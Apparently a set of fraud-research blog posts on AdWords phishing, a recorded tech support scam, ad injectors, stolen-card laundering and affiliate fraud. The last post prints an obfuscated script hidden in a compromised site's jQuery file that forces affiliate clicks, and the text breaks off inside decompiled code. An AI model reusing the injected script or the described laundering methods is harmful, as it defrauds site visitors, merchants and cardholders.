A reader sent me an email asking me to clarify the following statement from my last post:

“AdWords credentials are big bucks, more so if you phish a premium account.”

Platforms the likes of AdWords are constantly under attack. It’s astonishingly simple to verify this for yourself:

  • Head on over to google.com
  • Search for “adwords login”
  • Note the first ad

adwords_phishing_1

Inconsistencies with the first ad:

  • Display URL is for www.acefingerprint.com
  • Destination URL is for roofing-contractors-toronto.com

Clicking on the ad will land you here:

adwords_phishing_2Doesn’t get any easier than that to find someone attacking AdWords. Now remember, an attack on AdWords is an attack on all of the users of AdWords (Google’s advertisers). If Google is at the very least trying to protect their own vertical from abuse (their advertisers), then they’re not doing a very good job at it.

Once an attacker has valid AdWords credentials there are a few ways to monetize:

  1. Sell the account. Forums to sell a compromised account of this nature are in no short supply.
  2. Sell the traffic. The attacker brokers a relationship with someone who wants to buy traffic at a discount rate. This relationship most likely exists before the account was compromised. Attacker can offer huge volumes of traffic at ridiculous prices because the traffic she is selling is stolen (much like buying selling goods on the black market). Attacker can either modify the keywords of the compromised account to send targeted traffic, or just roll with what the account has anyway and maybe increase the bid price.
  3. Target a specific vertical and launder the traffic. At the end of the day, with a compromised account the attacker has free traffic. If it’s a premium account then the attacker has huge volumes of free traffic. An example of a premium account would be an advertiser who spends $10,000 a day on ads. When you’re dealing with the massive volumes that such a budget will bring, one has only to steer the traffic towards a somewhat probable monetization path and the machine will take care of the rest. For example, advertiser could set himself up as an affiliate in the Payday Loans vertical. Attacket then sets up an AdWords campaign in the Payday Loans vertical and sets her bid price to crush everyone else (it’s not her money, so why play nice?). Attacker funnels traffic from this campaign to a legitimate buffer site which launders traffic and forwards it on to the merchant facilitating Payday transactions/leads. Some of these will convert, which in turn will pay the attacker.

What’s still somewhat puzzling is why Google is not protecting their own vertical. If an AdWords account is compromised then the advertiser is going to lose money on ads that she did not purchase. If the advertiser loses this money then the advertiser is going to seek a refund. If the advertiser gets the refund then Google is going to lose money. If Google loses money then it’s within their interest to protect this vertical.

Of course, the simplest answer here may be that the cost of protecting this vertical (or any vertical) outweighs the cost of just issuing refunds in the event of a compromise. That’s fine from a pure monetary perspective, but what of the bad press that comes from posts the likes of what we saw on Reddit, or the future revenue lost from an advertiser who has had enough and shifts to an advertising platform that does invest in protecting their own vertical and those of their clients.

This Reddit post discusses an advertiser that is using Google’s AdWords system to phish Blockchain.info subscribers. If you’re not security/tech savvy, what this translates to is that an AdWords advertiser is tricking Google users into thinking that he/she is the face for another legitimate Web site. The idea is to steal user credentials.

As an attacker, using AdWords just makes sense. Why go through the all of the effort of organically growing a site to place high up in the organic rankings of Google, or even compromise an existing site, when Google AdWords will place you right at the top of the organic rankings for a small fee per user that they send your way. Using the AdWords system, an attacker can then precisely tune which region they want to target and even what time of day they would like the traffic to come their way.

One of the Reddit users posts

“The fact they allow this is ridiculous.”

Google does not allow this. Note the following from the AdWords Terms and Conditions:

“Ad Serving.  (a) Customer will not provide Ads containing malware, spyware or any other malicious code or knowingly breach or circumvent any Program security measure.”

One could make the argument that Google is just protecting themselves by adding this to their terms and conditions, and nothing more. Once Google has said that you’re not allowed to do this then they can wash their hands of all of this and only take a reactive approach, i.e., shut down an account when enough people complain

Leaving this argument at just this is insufficient to hold any weight though. The one problem with it, is that by Google not proactively searching for this nonsense then they themselves are open to precisely the same form of abuse.

Google AdWords Advertiser Targets Google AdWords

The advertiser highlighted by the red arrow below is phishing Google AdWords customers, using the Google AdWords infrastructure on the Google.com homepage when searching for “adwords”

adwords advertiser phishing adwords advertisersUpon clicking the ad, the user is redirected to the following landing page:

adwordsphishingNote this landing page is obviously not the official AdWords landing page. It is an attacker trying to lure unsuspecting victims into handing over their AdWords credentials. AdWords credentials are big bucks, more so if you phish a premium account. The attacker essentially acquires a powerful means with which to print money for himself until the account is closed.

Taking a closer look at the ad, note the inconsistencies:

  • The display URL (in green) is trasterosm2.com
  • The page I landed up at is friendsch.info
  • The destination URL (the first URL that a user is redirected to upon clicking the ad URL) is azmatkhans.com, surely a compromised site that is being exploited as a buffer for the redirect

The trick is that it’s easy to see these inconsistencies in review of an attack, but not in preview of a new AdWords campaign. When this advertiser first setup the campaign, the display URL probably matched the destination URL and in turn the final landing page. With some time and in sampling users for an attack (selecting 1 out of every 10 for example), the attacker can slowly creep his way into the system, even if Google is proactively searching for this form of abuse.

In the Tech Support scam, a scammer hijacks a well known brand in an effort to lure a victim who is then deceived into paying for an unnecessary/non-existent service or installing malware infected payloads.

This scam has been picked up by quite a few players in the last couple of years, successfully catching people left, right and center. If you want to bring yourself up to speed on how scammers have evolved in this space, you’ll find lots of documentation from the FTC, the Malwarebytes team and Microsoft.

When I think about a scam, of course the first question I ask is who is the victim, and eventually it’s interesting to figure out how the money flows. In today’s example, I’ll show you how a Tech Support scam flows from beginning to end. We’ll discuss who the victims are and we will examine the players that make money from all of this.

So with a couple of cell phones, a few false names and an intentionally flawed Virtual Machine (one which had not been activated) I decided to see what Tech Support scams looked like for myself.

The reason I chose a VM which had not yet been activated is because I wanted to see if the people I phoned for tech support pointed out the most obvious potential problem with the machine, i.e., that it had not yet been activated.

Online Advertising

On Friday the 23rd of May 2014, I found this Google advertiser:

google_advertiser_5_23It looks like he has an advertising campaign that is constantly running and targeting folks who are looking to log into their RoadRunner email:

5/23 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/23 – Google Advertiser URL leads to http://rrhelp.in/Log_In.htm
5/24 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/27 – Google Advertiser URL leads to http://www.rrlgn.in/Log_In_To_Account.htm

For each of these ads, the landing page will display the following message:

“Attention: Your Account Has Been Disabled Please Call 1-855-666-8849″

google_advertiser_tech_support_scam_0It’s obvious what is happening here, but to be clear: this advertiser has hijacked the TWC Road Runner login page and is trying to deceive the user into thinking that there is a problem.

Depending on your referrer to this page is (the site responsible for sending you here), the message could also be:

“Attention User Account Is Under Review Please Call RoadRunner Support 1-800-463-6338″

That the message/number changes matters not, for the intent remains the same: deception. In each case the advertiser has hijacked the TWC RoadRunner page and is trying to con the user into phoning the falsified tech support line.

What I thought is really interesting here is that they are not even bothering to steal credentials, they just want you to call in and fall victim to a quick scam that will send real dollars their way. Re the pic below, note that I entered false credentials and then pushed Login. Upon analyzing a packet trace for this activity, I found no evidence of credentials being sent to a server.

google_advertiser_tech_support_1Error code: RR-D68547 Your Email Account Has Been Temporary Suspended Due to Suspicious Activity Detected. Please RoadRunner Support on +1-800-463-6338

Not stealing credentials actually makes a whole lot of sense if you think about it a little. If they were stealing usernames and passwords then this would be an open and shut case. It would not take much for chaps like me to gather evidence against players that steal credentials in this manner, in which case they could land themselves in hot water pretty quickly.

Moving on, I called the guys behind 1-855-666-8849  a few times and each time I phoned they always answered with “Thank you for calling <GARBLED> technical support”. The <GARBLED> part is intentional from their side, they want you to think it’s your fault you did not hear them properly. Sometimes I asked what technical support they were, but I never got an answer.


Download audio

Unfortunately my initial attempts to get to the bottom of the scam didn’t get me very far. I think I came across as unconvincing, someone who may be a threat to their scam and so each time they ended up putting the phone down on me. Upon reflection, I think my problem was that I assumed that they were trying to sell me an antivirus solution from the get go, so my guess is this is what kept throwing them off. They would always tell me my computer was broken/compromised, that things had gone wrong and they needed to access it. They never told me how to facilitate this, I told them I had no idea what they were talking about and kept waiting for them to take the lead.

As I kept trying to see what this particular tech support scam was all about, it became evident to me that where other scammers were trying to get folks to download and install something, these guys were up to something different.

So I involved a senior citizen (my dad!), someone who I figured was the real target of their scam.

The result was quite different.

Download Audio

Highlights of the call:

04:50 scammers convince my father to let them take control of the machine. They ask him to load logmein123.com, this redirects to secure.logmeinrescue.com where they then ask him to enter the code 24227

logmein123

07:10 My father asks who they are, he clearly says “Are you TWC?” This is followed by a moment of silence and then their response “Yeah”

09:39 They have taken control of the machine, they then ask my father to log into his email so they can see the problem. What they did here was really sneaky. As he was typing in the password, they would keep pushing the caps lock key on their side, which meant that even if we were at the right service URL typing in the right credentials, it would be entered incorrectly and our login would be denied. This would open the doors for the scammers to prove that there certainly was a problem.

scammers 210:28 you can hear my father tapping the keyboard five times for a five character password and counting silently to himself. Mysteriously, a sixth character appears in the password prompt. Obviously scammers are entering the final character to keep forcing incorrect credentials.

scammers 411:30 scammer opens a command line window and types “EMAIL HAS BEEN HACKED”. My dad falls for this and starts to panic, when my father asks if his email has been hacked the scammer says “Yeah, that’s the problem sir, yeah”

scammers 5

13:58 scammer says “don’t worry, I am here to help you” whilst trying to scare my father by showing him logs from the Windows event log, all of which is completely normal

18:52 “are you a senior citizen sir?”

“Yes mam I am 76″

19:22 my father asks “are these experts from Microsoft?” to which the scammer responds “yes sir”

20:00 scammer explains to my father the difference between what Bestbuy’s Geek Squad offers and what they are offering. It’s all so confusing, but it’s supposed to be a good deal. Note the question my father asks at 20:50

“And these are specialized technicians from Microsoft, Yes”

“Yes”

scammers 6scammers 721:56 scammer loads up secure.nmi.com and logs in with merchant id “ishan.865tasu”

scammer 8 scammer 10For the first time we are privy to what their real identity may be, or at least what they are using to transfer funds: “International Technical Support Corporation”. If you’re following this call carefully, you know that the scammer just made a mistake on their side. They just logged my father directly into their merchant account obviously they don’t know that I just fell off the chair next to him.

22:50 They enter the Order ID ITSC102504 and will try to convince my father to complete the form with his details. Note the question my father asks before trying to complete the form

“Do you have special rates for over the age of 75?”

scammer 12

23:38 My father asks if he can spend the $599 over a period of time instead of one large payment. He explains that $600 is his rent for the month. They know he is an elderly gentleman, they know they are exploiting his trust. They know they are about to steal money that he cannot spare. What’s sad here is that my father is not a victim, but they don’t know that. How many elderly people have potentially fallen for this scam? We’re about to answer that questions thanks to these guys logging us into their merchant account.

26:18 scammer shares their address: “1113 6th ave, New Hyde Park, NY 11040″

31:00 scammer becomes impatient after we click refresh, nullifying everything we had spent the last ten minutes completing. She decides to transfer us to another scammer, but we decide to end her remote session and take a closer look at their merchant account.

Of interest to me at that point in time is how much money these unscrupulous individuals have made thus far. I used the Quickbooks feature of the merchant panel to get a quick idea.

scammer 13

Just to be clear here, for this account alone the scammers have conned 1538 people with this scam. At a total of $439,254.91, they are averaging $258 per person. What’s more terrifying here is the extremely low 3% rate of chargebacks/reversals. These are people that were savvy enough to see the scam and then demand a refund from their credit card company.

I shouldn’t have to say that this practice is unscrupulous. These are without a doubt scammers of the lowest possible order, bottom feeders that target old people and those that are not tech savvy enough to know any better.

The Players

1. Google facilitates the first part of this scam by allowing advertisers of this ilk onto their network. Average users, old people, kids, moms, tech elites, you name it, they trust the results given to them from a search engine. So why shouldn’t they trust what the page behind that first click tells them: “Attention: Your Account Has Been Disabled Please Call 1-855-666-8849″. After all, there’s no warning on the search result page saying “Hey be careful of these advertisers, we have no idea who they are or what they are going to try to sell you!”

Obviously the scammers know how trust is delegated here, so they will pay Google to exploit this as an advertiser for as long as they are allowed to do so.

But is Google a victim? Sure. Whilst they are taking the scammers money to show the ads in question, they are also indirectly a victim. Fingers will point to services the likes of theirs when one tracks back the scam to its origin.

2. NMI.COM – Network Merchants LLC, for a fee I presume, is allowing the money to flow from the target of the scam (my senior citizen dad in this case) through to the scammers. At the end of the day what the scammers are doing here is wire fraud, plain and simple. So if NMI didn’t know about the half million dollars these scammers potentially defrauded from victims before, they sure know about it now.

3. TWC Road Runner. They’re another victim. It’s their service that is being hijacked and their users plundered. Ultimately victims are dialing the support number listed because they thought TWC Road Runner disabled their account.

4. Microsoft. The scammers are using legitimate programs on a Microsoft Operating System to make the victims think something is wrong with Microsoft software. We know that it’s all just a lie though, the event  viewer is filled with legitimate warnings and errors. Typing “EMAIL HAS BEEN HACKED” in a command prompt does not mean that your email is hacked.

Furthermore, they hijack the Microsoft brand by saying that they are from Microsoft. Recall 19:22 where my father asks “are these experts from Microsoft?”

“yes sir”

5. The scammers themselves. From the Google ad landing pages, we know of three domains that they are using: rrlogg.in, rrlgn.in and rrhelp.in. Whois pages for these (here, here and here) list Dayanad Colony as the registrant using the number +91.9818290300 and email address karangosain2007@gmail.com

So what now?

Why are unscrupulous advertisers of this ilk allowed to run rampant? How is it that they can get away with something like this over and over again? Why aren’t the players responsible for playing a part in all of this (knowingly or unknowingly) made accountable here?

There’s no shortage of articles on bad guys like this [1,2,3,4] and from the merchant account above it’s obvious that these guys are profitable, so what gives?

The bottom line is that it’s the innocent consumers that are being nailed over and over again. Hard legal action coming in on the tail end of these scams is just not going to solve anything. In my mind I see the need for a very big and very angry gorilla stepping into the arena of online advertising sometime soon, and its name is regulation.

Updates

* 5/29/2014 – download links to the audio added *

* 6/3/2014 – scammer is still running strong through AdWords (Advertiser URL), now using the domain rrloginin.in and the number 1-855-808-1175 *

Search for “download skype”, “download google chrome”, “download firefox” or a myriad of other popular applications and you may find yourself unlucky enough to run into an ad injector.

Now an ad injector won’t present itself as an ad injector. Typically, it will bundle itself into an installer which will opt the user into installing a handful of programs onto her machine in addition to what she was originally looking for.

Sure, technical elites out there have no problem picking up on the subtle clues from an installer that an ad injector lies in waiting  (maybe they read the entire license agreement sometimes pointed to at the bottom of the screen), but less tech savvy folks think they are only getting what they were searching for. Nothing less, and arguably most important: nothing more.

Obviously, that’s not the case in today’s example, as we discuss an ad injector making the rounds and going by the name of Bee Coupons.

In the images below, with Bee Coupons installed courtesy of an installer on what was originally an uncompromised machine, I searched for “click fraud” on google.com. Google comes back with its responsive UI and I see exactly what I was expecting less than a second after pushing enter:

ad injectors and affiliate fraud may be good for business, but who's?Unfortunately, whilst Google was fetching its response to the “click fraud” query, Bee Coupons software was getting a result of its own. A few seconds pass and Bee Coupons decides to “enhance” Google’s search result with their own addition:

clickety clicky, kechang!

Of course the “enhanced results” aren’t really enhanced results at all, they’re ads. Upon clicking on those ads an advertiser will be charged a fee. The advertisers involved in this particular transaction are zoosk.com and ask.com. They may or may not be willing participants in this, for the online advertising ecosystem is fraught with so many complexities and third parties, that unless you sit and dissect a packet trace from start to finish every single time, it’s difficult to conclusively say who is who. Nonetheless, the odds are that Zoosk and Ask will be charged a fee upon a click.

But then where does the money go?

Good question, ordinarily the money would go to Google. You see, that’s how they fund the largest search engine on the planet, with ads from their own advertising network. More often than not they have a direct relationship with the advertiser. When Google is the publisher of an ad and the advertising network as well then they collect 100% of the fee. There are instances where Google is not the publisher of the ad, but facilitates delivery of the ad through their ad network, in which case Google still collects a fee from the advertiser, a portion of which is then given to the publisher.

I’m confused, how does Google make money here?

Google does not make money here, for whilst they are the publisher in this example they will not be paid upon someone clicking on the Zoosk or Ask ads. This is because those are ads that were not put there by Google. The ads belong to an entirely different advertising network that has hijacked the Google Search Result Page and inserted their own means of generating revenue.

Now the first rebuttal offered from an ad injector is that they received the permission of the user operating the computer in question to do this. Whilst this statement may be true (assuming the operator was not a child — popular target of installers), it’s inconsequential for they did not receive permission from the entity that mattered: the real publisher of the content, i.e., Google.

So to be clear, again, the ads that have been injected into Google’s site do not belong to Google.

So who do they belong to?

I clicked on the little “i” next to “Ads by Bee Coupons” and was directed to a page on advertising-support.com that offered to explain why I was seeing the ads in question:

You may be seeing ads as part of our advertising solution for Internet properties (such as websites or web browser extensions). This solution provides content at no cost to you and displays advertisements during your web browsing experience. It was installed by you, or someone using your computer.

“at no cost to you” is highlighted because this statement cannot always be true. If you are the publisher of content on the Web (say Google, for example) and Bee Coupons comes along and pushes your top advertisers down (who bid good money to be there) in order to make room for Bee Coupon’s advertisers, then there may indeed be a cost to you. The user that clicked on Bee Coupon’s ads did not click on your ads, which is ultimately money that should have been sent your way. Not earning when you could have is most definitely a cost and if you were Google in our example above then you shall bear the brunt of it.

What’s more interesting here is that the “advertising solution” installed on the machine (Bee Coupons in my case) is not available for download from advertising-support.com. In fact, I could not find any advertising solution software at all, and that’s where the installers come in.

Advertising-support.com

It’s worth spending a few more moments looking at advertising-support.com:

Revenue Skyrockets with Solutions from Advertising Support!

Solutions that are divided up into two categories, advertisers and publishers.bee_coupons_click_fraud_3

For advertisers:

advertising-support iPensatori comments
Competitive Rates This is the very reason why ad injectors exist at all, they offer competitive pricing. Instead of playing ball with the rest of the industry on advertising networks with established prices and that have permission to place their ads on a publisher’s site, advertisers enjoy better placements on premium publisher properties at lower rates with ad injectors
Traffic in all countries Welcome to the Internet
High quality traffic It most certainly is. This is why advertisers pay the big bucks to be in the #1 spot on Google

For publishers:

advertising-support iPensatori Comments
Very easy to implement One can’t help but wonder which publishers they are talking about here. It’s certainly not the publisher of the content (Google in our example), although if they were then it is pretty easy to implement: Google did nothing.
Non-Intrusive to users No comment
Maximized Earnings ?

Other Publishers Receiving Enhanced Ads

Google is not the only target of Bee Coupons. In order to satisfy the claims made above they have to inject ads into a number of top quality publishers. I captured a few samples below.

Twitterbee_coupons_click_fraud_6

Msnbee_coupons_click_fraud_5Youtube

bee_coupons_click_fraud_7WordPress

bee_coupons_click_fraud_8Yahoo

bee_coupons_click_fraud_9

 Enter the Affiliate

Affiliates are masters of marketing, which makes sense and in a way justifies the whole industry. A small company that is really good at putting together trips to the Amazon jungle may not know the ins and outs of online marketing, or even care to know it since their specialty is trips to the Amazon jungle so why concentrate on anything other than improving this service. As a result it is well within their interest to offload the marketing portion of their business onto affiliates in return for cutting them in on a slice of the pie when there is a sale. How wonderful!

Wonderful, that is, until a rogue affiliate enters the picture.

bee_coupons_click_fraud_4This packet trace steps us through the chain of events that happened behind the scenes upon clicking on the first Amazon advertiser provided by Bee Coupons:

  • Our adventure begins with s.txtsrving.info, a GET request with no referrer header (entity responsible for the traffic, usually the publisher) will return Javascript that will create an element in the DOM and click on it. So many reasons for doing this, one of which is to pick up a brand new referrer
  • Automated click from the JS above results in a GET request to 123srv.com with the referrer header now set to s.txtsrving.info. Response here includes JS which will redirect the browser to another script on 123srv.com
  • Response from 123srv.com redirects to advjmp.com which uses JS to redirect to Amazon via an Amazon affiliate link

Net effect is that one of Amazon’s affiliates (affiliate id advertiseco0e-20) basically out bid Amazon (with probably less money thanks to the injector) for the top spot on Google when searching for Amazon. If the user searching for Amazon clicks on this ad and then buys something from Amazon within a certain period of time (say 24 hours) then the affiliate responsible for purchasing the ad from the injector will be paid a commission.

Amazon may allow this behavior, but it seems unlikely that they do. Some simple reasons why not:

  1. Ultimately Amazon will be paying a commission on traffic that they would have received anyway, for not only were they the first ad displayed before the injector arrived, but they were the first organic link displayed as well
  2. This practice is awfully unfair to the honest Amazon affiliates out there that don’t know about ad injectors, since their cookies will be overwritten by the affiliate using the ad injector.

I’ve spent the last few years presenting at a number of affiliate conferences, meeting and shaking hands with affiliates in person, people who make affiliate marketing their primary means of making ends meet. They don’t know how to broker relationships with questionable traffic sources. They’re not programmers. They have never heard of practices the likes of referrer laundering, blackhat marketing, cookie-stuffing or pay per view marketing and they most certainly don’t know the ins and outs of ad injectors.

So if you’re an honest Amazon affiliate competing for the same traffic that this ad injector is sending to Amazon affiliate advertiseco0e-20, know this: you don’t stand a chance

Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

Cards

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look.

Pastebin.com is a surprising resource here. Point your browser to your favorite search engine and type in the following query:

“cvv site:pastebin.com”

The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

United States American Express $7.00
United States Discover $8.00
United States Visa & Mastercard $4.50
Europe American Express $12.50
Europe Discover $18.00
Europe Visa & Mastercard $14.50
Asia American Express $18.00
Asia Discover $18.00
Asia Visa & Mastercard $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quick as you can and make a clean getaway. One way to do this is sell items at a discount on online market A, once these sell then you buy the product through online market B with the stolen card and ship to the buyer from market A. Easy.

It’s a simple scam but scammers are lazy and this sounds like too much work. Mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in and by the time it starts any meaningful income then the account on A could get closed at any time (buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605″) yields a list of auctions with card writers that are ready to roll for less than $150.

ebay-writer-0  ebay-writer-1ebay-writer-2Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card

credit card track 2 data

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry) which can then be sold for sale at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on their weakest links in the ecosystem

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good’ol wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying, is why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.”

Affiliate programs vary dramatically in their incidence of fraud: in some merchants’ affiliate programs, rogue affiliates fill the ranks of high-earners.  Yet other similarly-sized merchants have little or no fraud.  Why the difference?

In Information and Incentives in Online Affiliate Marketing, Ben Edelman and I examine the impact of varying merchant management decisions.  Some merchants hire specialist outside advisors (“outsourced program managers” or OPM’s) to set and enforce program rules.  Others ask affiliate network staff to make these decisions.  Still others handle these tasks internally.

A merchant’s choice of management structure has significant implications for both the information available to decision-makers and the incentives that motivate those decision-makers.  Outside advisors tend to have better information: An OPM sees problems and trends across its many clients.  A network is even better positioned – enjoying direct access to log files, custom reports, and problems reported by any merchant in the network.  That said, outside advisors usually suffer clear incentive problems: most notably, networks are usually paid in proportion to a merchant’s affiliate channel spending, so networks have a significant incentive to encourage merchants to accept even undesirable affiliates.  In contrast, merchants’ own staff typically have incentives more closely aligned with the merchant’s genuine objectives.  For example, many in-house affiliate managers have stock, options, or bonus that depend on company profitability.  And working in a company builds intrinsic motivation and loyalty.  In short, there are some reasons to think outsourced specialists will yield superior results, but other reasons to favor in-house staff.

To separate these effects, we used crawlers to examine affiliate fraud at what we believe to be an unprecedented scope.  We automated more than 2 million page-loads on a variety of computers and virtual computers, examining the relative susceptibility of all CJ, LinkShare, and Google Affiliate Network merchants (as of spring 2012) to adware, cookie-stuffing, typosquatting, and loyalty apps.

We found outside advisors best able to find the “clear fraud” of adware and cookie-stuffing that are plainly prohibited by network rules.  But in-house staff do better at avoiding “grey area” practices such as typosquatting – schemes less plainly prohibited by network rules, yet still contrary to merchants’ interests.  On balance, there are good reasons to favor each approach – but a merchant choosing outsourced management should be sure to insist on borderline decisions always taken with the merchant’s interests at heart; and a merchant managing its programs in-house should be careful to avoid known cheaters a savvy specialist would more often exclude.

Incidental to our analysis of management structure, we also collected significant data about the scope of affiliate fraud more generally.  Some differences are stark: For example, Table 4 of the article reports Google Affiliate Network merchants suffering, on average, less than half as much adware and cookie-stuffing as LinkShare merchants.  Edelman has been critical of Google on many issues, but when it comes to affiliate quality, GAN was impressive.  GAN’s focus on affiliate quality comes through clearly in our large-sample data.

Our full analysis is under review by an academic journal.

Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.com is going to result in a request www.52zhishi.com/v.swf which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where does the initial request to 52zhishi.com come from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that like much of the technical marvels blackhats in this space, he was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a Jquery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires.../code>

In compromising this site, he has hidden his activities in this Jquery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF that is loaded a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends movieclip {
 
        public var loader:URLLoader;
        public var url:string;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
